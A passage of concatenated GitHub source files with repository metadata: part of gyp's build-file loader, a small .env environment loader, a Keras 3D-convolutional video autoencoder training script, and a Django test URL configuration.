  Conversion happens in place; nested lists and dicts are recursed into.
  """
  # enumerate replaces the Python 2-only xrange index loop and behaves
  # identically on both Python 2 and 3.  Replacing the_list[index] during
  # iteration is safe because the list's length never changes.
  for index, item in enumerate(the_list):
    if isinstance(item, int):
      the_list[index] = str(item)
    elif isinstance(item, dict):
      TurnIntIntoStrInDict(item)
    elif isinstance(item, list):
      TurnIntIntoStrInList(item)
def VerifyNoCollidingTargets(targets):
  """Verify that no two targets in the same directory share the same name.

  Arguments:
    targets: A list of targets in the form 'path/to/file.gyp:target_name'.

  Raises:
    Exception: on the first 'directory:target_name' pair claimed by two
        different gyp files.
  """
  # Maps 'subdirectory:target_name' -> the gyp file that first claimed it.
  seen = {}
  for target in targets:
    # 'path/to/file.gyp:target_name' -> path and name.
    build_path, target_name = target.split(':')
    directory, gyp_file = os.path.split(build_path)
    # Render the current directory as '.' so error messages stay readable.
    directory = directory or '.'
    collision_key = directory + ':' + target_name
    previous = seen.get(collision_key)
    if previous is not None:
      raise Exception('Duplicate target name "%s" in directory "%s" used both '
                      'in "%s" and "%s".' % (target_name, directory, gyp_file,
                                             previous))
    seen[collision_key] = gyp_file
def Load(build_files, variables, includes, depth, generator_input_info, check,
         circular_check):
  """Loads and fully processes the given .gyp build files.

  Top-level entry point of input processing: loads every build file (and,
  transitively, its dependencies), qualifies and expands dependency links,
  publishes dependent settings, expands configurations, applies list
  filters, and validates rules/actions/run_as sections.

  Returns:
    [flat_list, targets, data]: dependency-ordered qualified target names,
    the dict of fully processed target dicts, and the per-build-file data
    dict (returned so generators can see which files were loaded).
  """
  # Set up path_sections and non_configuration_keys with the default data plus
  # the generator-specifc data.
  global path_sections
  path_sections = base_path_sections[:]
  path_sections.extend(generator_input_info['path_sections'])
  global non_configuration_keys
  non_configuration_keys = base_non_configuration_keys[:]
  non_configuration_keys.extend(generator_input_info['non_configuration_keys'])
  # TODO(mark) handle variants if the generator doesn't want them directly.
  generator_handles_variants = \
      generator_input_info['generator_handles_variants']
  global absolute_build_file_paths
  absolute_build_file_paths = \
      generator_input_info['generator_wants_absolute_build_file_paths']
  global multiple_toolsets
  multiple_toolsets = generator_input_info[
      'generator_supports_multiple_toolsets']
  # A generator can have other lists (in addition to sources) be processed
  # for rules.
  extra_sources_for_rules = generator_input_info['extra_sources_for_rules']
  # Load build files.  This loads every target-containing build file into
  # the |data| dictionary such that the keys to |data| are build file names,
  # and the values are the entire build file contents after "early" or "pre"
  # processing has been done and includes have been resolved.
  # NOTE: data contains both "target" files (.gyp) and "includes" (.gypi), as
  # well as meta-data (e.g. 'included_files' key). 'target_build_files' keeps
  # track of the keys corresponding to "target" files.
  data = {'target_build_files': set()}
  aux_data = {}
  for build_file in build_files:
    # Normalize paths everywhere.  This is important because paths will be
    # used as keys to the data dict and for references between input files.
    build_file = os.path.normpath(build_file)
    try:
      LoadTargetBuildFile(build_file, data, aux_data, variables, includes,
                          depth, check)
    except Exception, e:
      # Annotate the exception with the offending file before re-raising.
      gyp.common.ExceptionAppend(e, 'while trying to load %s' % build_file)
      raise
  # Build a dict to access each target's subdict by qualified name.
  targets = BuildTargetsDict(data)
  # Fully qualify all dependency links.
  QualifyDependencies(targets)
  # Expand dependencies specified as build_file:*.
  ExpandWildcardDependencies(targets, data)
  if circular_check:
    # Make sure that any targets in a.gyp don't contain dependencies in other
    # .gyp files that further depend on a.gyp.
    VerifyNoGYPFileCircularDependencies(targets)
  [dependency_nodes, flat_list] = BuildDependencyList(targets)
  # Check that no two targets in the same directory have the same name.
  VerifyNoCollidingTargets(flat_list)
  # Handle dependent settings of various types.
  for settings_type in ['all_dependent_settings',
                        'direct_dependent_settings',
                        'link_settings']:
    DoDependentSettings(settings_type, flat_list, targets, dependency_nodes)
    # Take out the dependent settings now that they've been published to all
    # of the targets that require them.
    for target in flat_list:
      if settings_type in targets[target]:
        del targets[target][settings_type]
  # Make sure static libraries don't declare dependencies on other static
  # libraries, but that linkables depend on all unlinked static libraries
  # that they need so that their link steps will be correct.
  AdjustStaticLibraryDependencies(flat_list, targets, dependency_nodes)
  # Apply "post"/"late"/"target" variable expansions and condition evaluations.
  for target in flat_list:
    target_dict = targets[target]
    build_file = gyp.common.BuildFile(target)
    ProcessVariablesAndConditionsInDict(target_dict, True, variables,
                                        build_file)
  # Move everything that can go into a "configurations" section into one.
  for target in flat_list:
    target_dict = targets[target]
    SetUpConfigurations(target, target_dict)
  # Apply exclude (!) and regex (/) list filters.
  for target in flat_list:
    target_dict = targets[target]
    ProcessListFiltersInDict(target, target_dict)
  # Make sure that the rules make sense, and build up rule_sources lists as
  # needed.  Not all generators will need to use the rule_sources lists, but
  # some may, and it seems best to build the list in a common spot.
  # Also validate actions and run_as elements in targets.
  for target in flat_list:
    target_dict = targets[target]
    build_file = gyp.common.BuildFile(target)
    ValidateRulesInTarget(target, target_dict, extra_sources_for_rules)
    ValidateRunAsInTarget(target, target_dict, build_file)
    ValidateActionsInTarget(target, target_dict, build_file)
  # Generators might not expect ints.  Turn them into strs.
  TurnIntIntoStrInDict(data)
  # TODO(mark): Return |data| for now because the generator needs a list of
  # build files that came in.  In the future, maybe it should just accept
  # a list, and not the whole data dict.
  return [flat_list, targets, data]
| {
"content_hash": "5e3e702d963cc9fa1239bf6413dde5f2",
"timestamp": "",
"source": "github",
"line_count": 2244,
"max_line_length": 80,
"avg_line_length": 40.86096256684492,
"alnum_prop": 0.6521724905117131,
"repo_name": "leighpauls/k2cro4",
"id": "54e24665456c0fa5233edf5cc65cee4788b53fde",
"size": "91868",
"binary": false,
"copies": "12",
"ref": "refs/heads/master",
"path": "third_party/WebKit/Source/ThirdParty/gyp/pylib/gyp/input.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "ASP",
"bytes": "3062"
},
{
"name": "AppleScript",
"bytes": "25392"
},
{
"name": "Arduino",
"bytes": "464"
},
{
"name": "Assembly",
"bytes": "68131038"
},
{
"name": "C",
"bytes": "242794338"
},
{
"name": "C#",
"bytes": "11024"
},
{
"name": "C++",
"bytes": "353525184"
},
{
"name": "Common Lisp",
"bytes": "3721"
},
{
"name": "D",
"bytes": "1931"
},
{
"name": "Emacs Lisp",
"bytes": "1639"
},
{
"name": "F#",
"bytes": "4992"
},
{
"name": "FORTRAN",
"bytes": "10404"
},
{
"name": "Java",
"bytes": "3845159"
},
{
"name": "JavaScript",
"bytes": "39146656"
},
{
"name": "Lua",
"bytes": "13768"
},
{
"name": "Matlab",
"bytes": "22373"
},
{
"name": "Objective-C",
"bytes": "21887598"
},
{
"name": "PHP",
"bytes": "2344144"
},
{
"name": "Perl",
"bytes": "49033099"
},
{
"name": "Prolog",
"bytes": "2926122"
},
{
"name": "Python",
"bytes": "39863959"
},
{
"name": "R",
"bytes": "262"
},
{
"name": "Racket",
"bytes": "359"
},
{
"name": "Ruby",
"bytes": "304063"
},
{
"name": "Scheme",
"bytes": "14853"
},
{
"name": "Shell",
"bytes": "9195117"
},
{
"name": "Tcl",
"bytes": "1919771"
},
{
"name": "Verilog",
"bytes": "3092"
},
{
"name": "Visual Basic",
"bytes": "1430"
},
{
"name": "eC",
"bytes": "5079"
}
],
"symlink_target": ""
} |
from __future__ import print_function
import os
import ast
__author__ = 'Matteo Danieli'
def load_env(print_vars=False):
    """Load environment variables from a .env file, if present.

    Reads the file named by the ENV_FILE environment variable (default
    '.env').  Each KEY=VALUE line sets os.environ[KEY] unless that
    variable is already set.  Lines whose key starts with '#' are treated
    as comments; values wrapped in matching quotes are unquoted via
    ast.literal_eval.  A missing file is silently ignored.

    Arguments:
      print_vars: if True, print each newly set key and its value.
    """
    env_file = os.environ.get('ENV_FILE', '.env')
    try:
        # 'with' guarantees the handle is closed; the previous version
        # leaked the file object returned by open().
        with open(env_file) as f:
            lines = f.read().splitlines()
    except IOError:
        # No .env file: nothing to load.
        return
    for line in lines:
        if '=' not in line:
            continue
        key, value = line.split('=', 1)
        if key.startswith('#'):
            continue  # commented-out entry
        if key in os.environ:
            continue  # never clobber pre-existing environment variables
        quoted = (value.startswith('"') and value.endswith('"') or
                  value.startswith("'") and value.endswith("'"))
        os.environ[key] = ast.literal_eval(value) if quoted else value
        if print_vars:
            print(key, os.environ[key])
| {
"content_hash": "1f3acfccbd6cef6fb62eb415207cb802",
"timestamp": "",
"source": "github",
"line_count": 32,
"max_line_length": 82,
"avg_line_length": 34.96875,
"alnum_prop": 0.516532618409294,
"repo_name": "BendingSpoons/envious",
"id": "a7fcd86659439a49467ed7f37c48d4001bfe1e39",
"size": "1119",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "envious/load.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "5800"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import hickle as hkl
import numpy as np
np.random.seed(2 ** 10)
from keras import backend as K
K.set_image_dim_ordering('tf')
from keras.layers import Dropout
from keras.models import Sequential
from keras.layers.core import Activation
from keras.utils.vis_utils import plot_model
from keras.layers.wrappers import TimeDistributed
from keras.layers.convolutional import Conv2D
from keras.layers.convolutional import Conv2DTranspose
from keras.layers.convolutional import Conv3D
from keras.layers.convolutional import Conv3DTranspose
from keras.layers.convolutional_recurrent import ConvLSTM2D
from keras.layers.normalization import BatchNormalization
from keras.callbacks import LearningRateScheduler
from keras.layers.advanced_activations import LeakyReLU
from keras.layers import Input
from keras.models import Model
from config_3d import *
import tb_callback
import lrs_callback
import argparse
import math
import os
import cv2
from sys import stdout
def encoder_model():
    """Builds the 3D-convolutional encoder.

    Input clips of shape (VIDEO_LENGTH/2, 128, 128, 3) are spatially
    downsampled 128 -> 32 -> 16 while the temporal axis is kept intact,
    producing a 16x16x32 feature volume per timestep.
    """
    model = Sequential()

    def add_block_tail(m):
        # Shared BatchNorm -> LeakyReLU -> Dropout tail after each conv.
        m.add(TimeDistributed(BatchNormalization()))
        m.add(TimeDistributed(LeakyReLU(alpha=0.2)))
        m.add(TimeDistributed(Dropout(0.5)))

    # Block 1: 128x128 -> 32x32 (spatial stride 4).
    model.add(Conv3D(filters=128,
                     strides=(1, 4, 4),
                     kernel_size=(3, 11, 11),
                     padding='same',
                     input_shape=(int(VIDEO_LENGTH / 2), 128, 128, 3)))
    add_block_tail(model)

    # Block 2: 32x32 -> 16x16 (spatial stride 2).
    model.add(Conv3D(filters=64,
                     strides=(1, 2, 2),
                     kernel_size=(3, 5, 5),
                     padding='same'))
    add_block_tail(model)

    # Block 3: 16x16 preserved, channels reduced to 32.
    model.add(Conv3D(filters=32,
                     strides=(1, 1, 1),
                     kernel_size=(3, 5, 5),
                     padding='same'))
    add_block_tail(model)

    return model
def decoder_model():
    """Builds the transposed-3D-conv decoder.

    Maps a (10, 16, 16, 32) feature volume back to a (10, 128, 128, 3)
    frame sequence; the final activation is tanh.
    """
    inputs = Input(shape=(10, 16, 16, 32))

    def finish_block(x, activation):
        # Shared BatchNorm -> activation -> Dropout tail for every block.
        x = TimeDistributed(BatchNormalization())(x)
        x = TimeDistributed(activation)(x)
        return TimeDistributed(Dropout(0.5))(x)

    # Block 1: 16x16 preserved (input_shape kept for parity with the
    # original layer configuration).
    x = Conv3DTranspose(filters=64,
                        kernel_size=(3, 5, 5),
                        padding='same',
                        strides=(1, 1, 1),
                        input_shape=(10, 16, 16, 32))(inputs)
    x = finish_block(x, LeakyReLU(alpha=0.2))

    # Block 2: 16x16 -> 32x32.
    x = Conv3DTranspose(filters=128,
                        kernel_size=(3, 5, 5),
                        padding='same',
                        strides=(1, 2, 2))(x)
    x = finish_block(x, LeakyReLU(alpha=0.2))

    # Block 3: 32x32 -> 64x64.
    x = Conv3DTranspose(filters=64,
                        kernel_size=(3, 5, 5),
                        padding='same',
                        strides=(1, 2, 2))(x)
    x = finish_block(x, LeakyReLU(alpha=0.2))

    # Block 4: 64x64 -> 128x128, 3 output channels, tanh range [-1, 1].
    x = Conv3DTranspose(filters=3,
                        kernel_size=(3, 11, 11),
                        strides=(1, 2, 2),
                        padding='same')(x)
    predictions = finish_block(x, Activation('tanh'))

    return Model(inputs=inputs, outputs=predictions)
def set_trainability(model, trainable):
    """Sets the trainable flag on |model| itself and on each of its layers.

    Both the model-level flag and every per-layer flag are updated so the
    setting takes effect regardless of where Keras consults it.
    """
    for obj in [model] + list(model.layers):
        obj.trainable = trainable
def autoencoder_model(encoder, decoder):
    """Chains |encoder| and |decoder| into one sequential autoencoder."""
    stacked = Sequential()
    for submodel in (encoder, decoder):
        stacked.add(submodel)
    return stacked
def combine_images(X, y, generated_images):
    """Tiles input, ground-truth, and generated video batches into images.

    Each argument is a 5-D batch (batch, time, height, width, channels).
    All frames of all videos are unrolled and packed row-major into a
    roughly square grid, producing one large image per argument.

    Returns:
      (orig_image, truth_image, pred_image): tiled grids for X, y, and
      generated_images respectively, each keeping its source's dtype.
    """
    # The three batches get identical treatment; the original duplicated
    # this tiling loop three times.
    return (_tile_batch(X), _tile_batch(y), _tile_batch(generated_images))


def _tile_batch(batch):
    """Unrolls a (batch, time, h, w, c) array and tiles its frames into a
    single row-major grid image of the same dtype."""
    # Flatten batch and time into one frames axis.
    n_frames = batch.shape[0] * batch.shape[1]
    frames = batch.reshape((n_frames,) + batch.shape[2:])
    # Grid geometry: width = floor(sqrt(n)), height = ceil(n / width),
    # matching the original packing.
    width = int(math.sqrt(n_frames))
    height = int(math.ceil(float(n_frames) / width))
    frame_h, frame_w, channels = frames.shape[1:]
    image = np.zeros((height * frame_h, width * frame_w, channels),
                     dtype=batch.dtype)
    for index, frame in enumerate(frames):
        row = index // width
        col = index % width
        image[row * frame_h:(row + 1) * frame_h,
              col * frame_w:(col + 1) * frame_w, :] = frame
    return image
def load_weights(weights_file, model):
    """Thin wrapper: loads the weights at |weights_file| into |model|
    in place (argument order mirrors the call sites in this script)."""
    model.load_weights(weights_file)
def run_utilities(encoder, decoder, autoencoder, ENC_WEIGHTS, DEC_WEIGHTS):
    """Optionally summarizes, serializes, and plots the models, then
    pre-loads encoder/decoder weights.

    Behavior is driven by the config flags PRINT_MODEL_SUMMARY, SAVE_MODEL
    and PLOT_MODEL; a weights path equal to the literal string "None"
    means "do not load".
    """
    named_models = [(encoder, 'encoder'),
                    (decoder, 'decoder'),
                    (autoencoder, 'autoencoder')]

    if PRINT_MODEL_SUMMARY:
        for m, _ in named_models:
            print(m.summary())

    if SAVE_MODEL:
        # Serialize each architecture (not weights) as JSON next to the
        # other model artifacts.
        print("Saving models to file...")
        for m, tag in named_models:
            with open(os.path.join(MODEL_DIR, tag + ".json"), "w") as json_file:
                json_file.write(m.to_json())

    if PLOT_MODEL:
        for m, tag in named_models:
            plot_model(m, to_file=os.path.join(MODEL_DIR, tag + '.png'),
                       show_shapes=True)

    if ENC_WEIGHTS != "None":
        print("Pre-loading encoder with weights...")
        load_weights(ENC_WEIGHTS, encoder)
    if DEC_WEIGHTS != "None":
        print("Pre-loading decoder with weights...")
        load_weights(DEC_WEIGHTS, decoder)
def load_X(videos_list, index, data_dir):
    """Loads the |index|-th batch of video clips as normalized frames.

    Frames are read from data_dir as 'frame_<n>.png' and scaled from
    [0, 255] to [-1, 1].  videos_list maps (video, position) to frame
    numbers; row index*BATCH_SIZE + b selects the b-th clip of the batch.
    Unreadable frames are reported and left as zeros.
    """
    X = np.zeros((BATCH_SIZE, VIDEO_LENGTH,) + IMG_SIZE)
    for b in range(BATCH_SIZE):
        clip_frames = videos_list[index * BATCH_SIZE + b]
        for t in range(VIDEO_LENGTH):
            im_file = os.path.join(data_dir,
                                   "frame_" + str(clip_frames[t]) + ".png")
            try:
                frame = cv2.imread(im_file, cv2.IMREAD_COLOR)
                X[b, t] = (frame.astype(np.float32) - 127.5) / 127.5
            except AttributeError as e:
                # cv2.imread returns None for missing/corrupt files, so
                # .astype raises AttributeError; report and keep zeros.
                print(im_file)
                print(e)
    return X
def train(BATCH_SIZE, ENC_WEIGHTS, DEC_WEIGHTS):
    """Trains the spatio-temporal autoencoder on the training frame set.

    Builds contiguous VIDEO_LENGTH-frame clips from the frame-source index,
    trains the autoencoder to predict the second half of each clip from the
    first half, and writes per-epoch logs, sample images, and weight
    checkpoints (paths/flags come from config_3d).
    """
    print ("Loading data...")
    frames_source = hkl.load(os.path.join(DATA_DIR, 'sources_train_128.hkl'))
    # Build video progressions: slide a VIDEO_LENGTH window over the frame
    # index, only keeping windows whose frames all come from one source
    # video (len(set(...)) == 1); on a source boundary, jump the window.
    videos_list = []
    start_frame_index = 1
    end_frame_index = VIDEO_LENGTH + 1
    while (end_frame_index <= len(frames_source)):
        frame_list = frames_source[start_frame_index:end_frame_index]
        if (len(set(frame_list)) == 1):
            videos_list.append(range(start_frame_index, end_frame_index))
            start_frame_index = start_frame_index + 1
            end_frame_index = end_frame_index + 1
        else:
            start_frame_index = end_frame_index - 1
            end_frame_index = start_frame_index + VIDEO_LENGTH
    # NOTE(review): np.asarray over range objects requires Python 2 (where
    # range returns a list); confirm before porting to Python 3.
    videos_list = np.asarray(videos_list, dtype=np.int32)
    n_videos = videos_list.shape[0]
    if SHUFFLE:
        # Shuffle images to aid generalization
        videos_list = np.random.permutation(videos_list)
    # Build the Spatio-temporal Autoencoder
    print ("Creating models...")
    encoder = encoder_model()
    decoder = decoder_model()
    autoencoder = autoencoder_model(encoder, decoder)
    run_utilities(encoder, decoder, autoencoder, ENC_WEIGHTS, DEC_WEIGHTS)
    autoencoder.compile(loss='mean_squared_error', optimizer=OPTIM)
    NB_ITERATIONS = int(n_videos/BATCH_SIZE)
    # Setup TensorBoard Callback
    TC = tb_callback.TensorBoard(log_dir=TF_LOG_DIR, histogram_freq=0, write_graph=False, write_images=False)
    LRS = lrs_callback.LearningRateScheduler(schedule=schedule)
    LRS.set_model(autoencoder)
    print ("Beginning Training...")
    # Begin Training
    for epoch in range(NB_EPOCHS):
        print("\n\nEpoch ", epoch)
        loss = []
        # Set learning rate every epoch
        LRS.on_epoch_begin(epoch=epoch)
        lr = K.get_value(autoencoder.optimizer.lr)
        print ("Learning rate: " + str(lr))
        for index in range(NB_ITERATIONS):
            # Train Autoencoder: first half of each clip is the input, the
            # second half is the prediction target.
            X = load_X(videos_list, index, DATA_DIR)
            X_train = X[:, 0 : int(VIDEO_LENGTH/2)]
            y_train = X[:, int(VIDEO_LENGTH/2) :]
            loss.append(autoencoder.train_on_batch(X_train, y_train))
            # Textual progress bar (40 '=' segments across the epoch).
            arrow = int(index / (NB_ITERATIONS / 40))
            stdout.write("\rIteration: " + str(index) + "/" + str(NB_ITERATIONS-1) + " " +
                         "loss: " + str(loss[len(loss)-1]) +
                         "\t [" + "{0}>".format("="*(arrow)))
            stdout.flush()
            if SAVE_GENERATED_IMAGES:
                # Save generated images to file; originals/ground truth are
                # only written during the first epoch since they don't change.
                predicted_images = autoencoder.predict(X_train, verbose=0)
                orig_image, truth_image, pred_image = combine_images(X_train, y_train, predicted_images)
                # Undo the [-1, 1] normalization before writing PNGs.
                pred_image = pred_image * 127.5 + 127.5
                orig_image = orig_image * 127.5 + 127.5
                truth_image = truth_image * 127.5 + 127.5
                if epoch == 0 :
                    cv2.imwrite(os.path.join(GEN_IMAGES_DIR, str(epoch) + "_" + str(index) + "_orig.png"), orig_image)
                    cv2.imwrite(os.path.join(GEN_IMAGES_DIR, str(epoch) + "_" + str(index) + "_truth.png"), truth_image)
                cv2.imwrite(os.path.join(GEN_IMAGES_DIR, str(epoch) + "_" + str(index) + ".png"), pred_image)
        # then after each epoch/iteration
        avg_loss = sum(loss)/len(loss)
        logs = {'loss': avg_loss}
        TC.on_epoch_end(epoch, logs)
        # Log the losses
        with open(os.path.join(LOG_DIR, 'losses.json'), 'a') as log_file:
            log_file.write("{\"epoch\":%d, \"d_loss\":%f};\n" % (epoch, avg_loss))
        print("\nAvg loss: " + str(avg_loss))
        # Save model weights per epoch to file
        encoder.save_weights(os.path.join(CHECKPOINT_DIR, 'encoder_epoch_'+str(epoch)+'.h5'), True)
        decoder.save_weights(os.path.join(CHECKPOINT_DIR, 'decoder_epoch_' + str(epoch) + '.h5'), True)
    # End TensorBoard Callback
    TC.on_train_end('_')
def test(ENC_WEIGHTS, DEC_WEIGHTS):
    """Evaluate the trained autoencoder on the test split.

    Loads encoder/decoder weights from the given paths, runs the model over
    every test batch, writes the original / ground-truth / predicted frame
    grids as PNGs, and prints the average test loss.
    """
    # Build the models and load the requested weights.
    print ("Creating models...")
    encoder = encoder_model()
    decoder = decoder_model()
    autoencoder = autoencoder_model(encoder, decoder)
    run_utilities(encoder, decoder, autoencoder, ENC_WEIGHTS, DEC_WEIGHTS)
    autoencoder.compile(loss='mean_squared_error', optimizer=OPTIM)

    # Build video progressions: non-overlapping windows of VIDEO_LENGTH
    # consecutive frames that all belong to the same source clip.
    frames_source = hkl.load(os.path.join(TEST_DATA_DIR, 'sources_test_128.hkl'))
    videos_list = []
    start_frame_index = 1
    end_frame_index = VIDEO_LENGTH + 1
    while end_frame_index <= len(frames_source):
        frame_list = frames_source[start_frame_index:end_frame_index]
        if len(set(frame_list)) == 1:
            # Homogeneous window: keep it and advance a full video length.
            videos_list.append(range(start_frame_index, end_frame_index))
            start_frame_index += VIDEO_LENGTH
            end_frame_index += VIDEO_LENGTH
        else:
            # Clip boundary inside the window: restart just before it.
            start_frame_index = end_frame_index - 1
            end_frame_index = start_frame_index + VIDEO_LENGTH
    videos_list = np.asarray(videos_list, dtype=np.int32)
    n_videos = videos_list.shape[0]

    # Run the model batch by batch, accumulating per-batch losses.
    loss = []
    NB_ITERATIONS = int(n_videos / BATCH_SIZE)
    half = int(VIDEO_LENGTH / 2)
    for index in range(NB_ITERATIONS):
        X = load_X(videos_list, index, TEST_DATA_DIR)
        # First half of each clip is the input, second half the target.
        X_test = X[:, 0:half]
        y_test = X[:, half:]
        loss.append(autoencoder.test_on_batch(X_test, y_test))
        y_pred = autoencoder.predict_on_batch(X_test)

        # Simple in-place progress bar on stdout.
        arrow = int(index / (NB_ITERATIONS / 40))
        stdout.write("\rIteration: " + str(index) + "/" + str(NB_ITERATIONS - 1) + " " +
                     "loss: " + str(loss[-1]) +
                     "\t [" + "{0}>".format("=" * arrow))
        stdout.flush()

        # Undo the [-1, 1] normalisation (x * 127.5 + 127.5) before saving.
        orig_image, truth_image, pred_image = combine_images(X_test, y_test, y_pred)
        for suffix, image in (("_orig.png", orig_image),
                              ("_truth.png", truth_image),
                              ("_pred.png", pred_image)):
            cv2.imwrite(os.path.join(TEST_RESULTS_DIR, str(index) + suffix),
                        image * 127.5 + 127.5)

    avg_loss = sum(loss) / len(loss)
    print("\nAvg loss: " + str(avg_loss))
def get_args():
    """Parse and return the command-line arguments for this script.

    Options:
        --mode        "train" or "test" (selects the entry point).
        --enc_weights path to encoder weights, or the string "None".
        --dec_weights path to decoder weights, or the string "None".
        --batch_size  overrides the module-level BATCH_SIZE default.
        --nice        boolean flag, off by default.
    """
    parser = argparse.ArgumentParser()
    # String options; weight paths default to the literal string "None",
    # which run_utilities() treats as "do not load".
    parser.add_argument("--mode", type=str)
    parser.add_argument("--enc_weights", type=str, default="None")
    parser.add_argument("--dec_weights", type=str, default="None")
    parser.add_argument("--batch_size", type=int, default=BATCH_SIZE)
    # store_true already defaults to False.
    parser.add_argument("--nice", dest="nice", action="store_true", default=False)
    return parser.parse_args()
# Script entry point: dispatch to train() or test() based on --mode.
if __name__ == "__main__":
    args = get_args()
    if args.mode == "train":
        train(BATCH_SIZE=args.batch_size,
              ENC_WEIGHTS=args.enc_weights,
              DEC_WEIGHTS=args.dec_weights)
    # NOTE(review): any --mode value other than "train"/"test" falls
    # through silently with no error message.
    if args.mode == "test":
        test(ENC_WEIGHTS=args.enc_weights,
DEC_WEIGHTS=args.dec_weights) | {
"content_hash": "e323da0d8dc0ca0575f0bc2eea884695",
"timestamp": "",
"source": "github",
"line_count": 424,
"max_line_length": 116,
"avg_line_length": 36.839622641509436,
"alnum_prop": 0.5980153649167733,
"repo_name": "pratikgujjar/DeepIntent",
"id": "bf3143ddd689358b48768af40f30084525c54f98",
"size": "15620",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "code/autoencoder_model/scripts/3D_autoencoder.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "317224"
},
{
"name": "Shell",
"bytes": "1059"
}
],
"symlink_target": ""
} |
from django.urls import re_path
from . import views
# Routes for this included urlconf; the extra dict is passed to the view
# as a keyword argument ('message'), per Django's re_path() contract.
urlpatterns = [
    re_path(r'extra_2/$', views.extra_view, {'message': 'test included urlconf'}, name='extra_second'),
]
| {
"content_hash": "1fac50a4165192d00f1594ab548bae3a",
"timestamp": "",
"source": "github",
"line_count": 7,
"max_line_length": 103,
"avg_line_length": 25.142857142857142,
"alnum_prop": 0.6818181818181818,
"repo_name": "rsalmaso/django-cms",
"id": "bae71666ba174d0de323970e75de903892bce39a",
"size": "176",
"binary": false,
"copies": "3",
"ref": "refs/heads/develop",
"path": "cms/test_utils/project/sampleapp/urls_extra.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "204223"
},
{
"name": "JavaScript",
"bytes": "1250281"
},
{
"name": "Python",
"bytes": "2386268"
},
{
"name": "SCSS",
"bytes": "137693"
},
{
"name": "Shell",
"bytes": "22511"
}
],
"symlink_target": ""
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.